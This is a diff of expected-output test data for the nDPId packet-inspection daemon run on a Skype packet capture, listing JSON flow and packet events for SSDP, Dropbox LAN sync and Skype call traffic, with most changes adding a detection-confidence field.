-00613{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2593,"source":"skype.pcap","alias":"nDPId-test","flow_id":274,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969745776,"flow_last_seen":1431969745776,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"ts_msec":1431969745776,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":56886,"dst_port":1900,"l4_proto":"udp","ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2593,"source":"skype.pcap","alias":"nDPId-test","flow_id":274,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969745776,"flow_last_seen":1431969745776,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"ts_msec":1431969745776,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":56886,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
 00612{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2594,"source":"skype.pcap","alias":"nDPId-test","flow_id":274,"flow_packet_id":2,"flow_last_seen":1431969745776,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":174,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":174,"pkt_l4_len":140,"ts_msec":1431969745776,"pkt":"AQBef\/\/6PBXCt3IOCABFAACg2\/EAAAERK5fAqAEi7\/\/\/+t42B2wAjLsJTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KTVg6IDINCkhPU1Q6IDIzOS4yNTUuMjU1LjI1MDoxOTAwDQpNQU46ICJzc2RwOmRpc2NvdmVyIg0KU1Q6IHVybjpzY2hlbWFzLXVwbnAtb3JnOnNlcnZpY2U6V0FOSVBDb25uZWN0aW9uOjENCg0K"}
 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2595,"source":"skype.pcap","alias":"nDPId-test","flow_id":275,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969745776,"flow_last_seen":1431969745776,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"ts_msec":1431969745776,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":64560,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00615{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2595,"source":"skype.pcap","alias":"nDPId-test","flow_id":275,"flow_packet_id":1,"flow_last_seen":1431969745776,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"ts_msec":1431969745776,"pkt":"AQBef\/\/6PBXCt3IOCABFAAChjL0AAAEResrAqAEi7\/\/\/+vwwB2wAjTccTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KTVg6IDINCkhPU1Q6IDIzOS4yNTUuMjU1LjI1MDoxOTAwDQpNQU46ICJzc2RwOmRpc2NvdmVyIg0KU1Q6IHVybjpzY2hlbWFzLXVwbnAtb3JnOnNlcnZpY2U6V0FOUFBQQ29ubmVjdGlvbjoxDQoNCg=="}
-00613{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2595,"source":"skype.pcap","alias":"nDPId-test","flow_id":275,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969745776,"flow_last_seen":1431969745776,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"ts_msec":1431969745776,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":64560,"dst_port":1900,"l4_proto":"udp","ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2595,"source":"skype.pcap","alias":"nDPId-test","flow_id":275,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969745776,"flow_last_seen":1431969745776,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"ts_msec":1431969745776,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":64560,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
 00611{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2596,"source":"skype.pcap","alias":"nDPId-test","flow_id":275,"flow_packet_id":2,"flow_last_seen":1431969745776,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":174,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":174,"pkt_l4_len":140,"ts_msec":1431969745776,"pkt":"AQBef\/\/6PBXCt3IOCABFAACgyNwAAAERPqzAqAEi7\/\/\/+vwwB2wAjJ0PTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KTVg6IDINCkhPU1Q6IDIzOS4yNTUuMjU1LjI1MDoxOTAwDQpNQU46ICJzc2RwOmRpc2NvdmVyIg0KU1Q6IHVybjpzY2hlbWFzLXVwbnAtb3JnOnNlcnZpY2U6V0FOSVBDb25uZWN0aW9uOjENCg0K"}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2597,"source":"skype.pcap","alias":"nDPId-test","flow_id":276,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969745776,"flow_last_seen":1431969745776,"flow_idle_time":180000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":0,"ts_msec":1431969745776,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49511,"dst_port":5351,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00443{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2597,"source":"skype.pcap","alias":"nDPId-test","flow_id":276,"flow_packet_id":1,"flow_last_seen":1431969745776,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1431969745776,"pkt":"0NQSxnP1PBXCt3IOCABFAAAoljUAAEARYRzAqAEiwKgBAcFnFOcAFDI4AAEAADLdMt0AAA4Q"}
@@ -1035,101 +1034,101 @@
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2649,"source":"skype.pcap","alias":"nDPId-test","flow_id":277,"flow_packet_id":1,"flow_last_seen":1431969750597,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431969750597,"pkt":"0NQSxnP1PBXCt3IOCABFAABAYx1AAEAGQ2nAqAEinTg1L8PWMD5iE\/TfAAAAALAC\/\/\/p7gAAAgQFtAEDAwUBAQgKPiQvsAAAAAAEAgAA"}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2651,"source":"skype.pcap","alias":"nDPId-test","flow_id":277,"flow_packet_id":2,"flow_last_seen":1431969750865,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1431969750865,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADMGs4qdODUvwKgBIjA+w9azhlZQYhP04KASOJDCuQAAAgQFrAQCCApiCpO7PiQvsAEDAwk="}
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2652,"source":"skype.pcap","alias":"nDPId-test","flow_id":277,"flow_packet_id":3,"flow_last_seen":1431969750865,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1431969750865,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0wMFAAEAG5dDAqAEinTg1L8PWMD5iE\/Tgs4ZWUYAQECwY2QAAAQEICj4kMLtiCpO7"}
-00662{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2659,"source":"skype.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969659392,"flow_last_seen":1431969659392,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431969751222,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.24","src_port":13021,"dst_port":40001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00662{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2659,"source":"skype.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969660403,"flow_last_seen":1431969660403,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431969751222,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.21","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00662{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2659,"source":"skype.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969654389,"flow_last_seen":1431969654389,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431969751222,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.28","src_port":13021,"dst_port":40009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00662{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2659,"source":"skype.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969656410,"flow_last_seen":1431969656410,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969751222,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.33","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00662{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2659,"source":"skype.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969659392,"flow_last_seen":1431969659392,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431969751222,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.45","src_port":13021,"dst_port":40012,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00662{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2659,"source":"skype.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969654389,"flow_last_seen":1431969654389,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1431969751222,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.15","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00657{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2659,"source":"skype.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1431969656652,"flow_last_seen":1431969746885,"flow_idle_time":180000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":2008,"flow_avg_l4_payload_len":502,"midstream":0,"ts_msec":1431969751222,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
-00657{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2659,"source":"skype.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1431969657029,"flow_last_seen":1431969747141,"flow_idle_time":180000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":2008,"flow_avg_l4_payload_len":502,"midstream":0,"ts_msec":1431969751222,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
-00655{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2659,"source":"skype.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1431969656652,"flow_last_seen":1431969746885,"flow_idle_time":180000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":2008,"flow_avg_l4_payload_len":502,"midstream":0,"ts_msec":1431969751222,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
-00655{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2659,"source":"skype.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1431969657029,"flow_last_seen":1431969747142,"flow_idle_time":180000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":2008,"flow_avg_l4_payload_len":502,"midstream":0,"ts_msec":1431969751222,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
-00662{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2659,"source":"skype.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969659392,"flow_last_seen":1431969659392,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1431969751222,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00661{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2659,"source":"skype.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969657367,"flow_last_seen":1431969657367,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969751222,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.150","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00661{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2659,"source":"skype.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969660403,"flow_last_seen":1431969660403,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969751222,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.159","src_port":13021,"dst_port":40009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00661{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2659,"source":"skype.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969657367,"flow_last_seen":1431969657367,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1431969751222,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.140","src_port":13021,"dst_port":40012,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00661{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2659,"source":"skype.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969654389,"flow_last_seen":1431969654389,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431969751222,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.165","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00661{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2659,"source":"skype.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969652367,"flow_last_seen":1431969652367,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431969751222,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00665{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2659,"source":"skype.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969655400,"flow_last_seen":1431969655400,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431969751222,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00663{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2659,"source":"skype.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969655399,"flow_last_seen":1431969655399,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431969751222,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.24","src_port":13021,"dst_port":40001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00663{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2659,"source":"skype.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969655400,"flow_last_seen":1431969655400,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1431969751222,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.48","src_port":13021,"dst_port":40008,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00664{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2659,"source":"skype.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969656410,"flow_last_seen":1431969656410,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431969751222,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.172","src_port":13021,"dst_port":40010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00663{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2659,"source":"skype.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969751222,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.17","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00664{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2659,"source":"skype.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969653376,"flow_last_seen":1431969653376,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431969751222,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.142","src_port":13021,"dst_port":40023,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00663{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2659,"source":"skype.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969653376,"flow_last_seen":1431969653376,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431969751222,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.15","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00663{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2659,"source":"skype.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969655400,"flow_last_seen":1431969655400,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969751222,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.42","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00664{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2659,"source":"skype.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969657368,"flow_last_seen":1431969657368,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431969751222,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.153","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00663{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2659,"source":"skype.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969653376,"flow_last_seen":1431969653376,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431969751222,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.46","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00664{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2659,"source":"skype.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969657367,"flow_last_seen":1431969657367,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431969751222,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.145","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00664{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2659,"source":"skype.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969654389,"flow_last_seen":1431969654389,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1431969751222,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.160","src_port":13021,"dst_port":40028,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00663{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2659,"source":"skype.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969657368,"flow_last_seen":1431969657368,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431969751222,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.25","src_port":13021,"dst_port":40028,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
